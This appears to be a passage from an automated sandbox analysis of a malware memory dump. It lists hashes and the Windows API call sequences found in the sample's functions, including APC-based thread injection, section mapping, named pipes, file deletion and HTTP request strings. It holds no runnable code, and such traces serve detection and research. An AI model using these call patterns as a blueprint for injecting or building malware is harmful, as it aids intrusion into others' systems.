  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
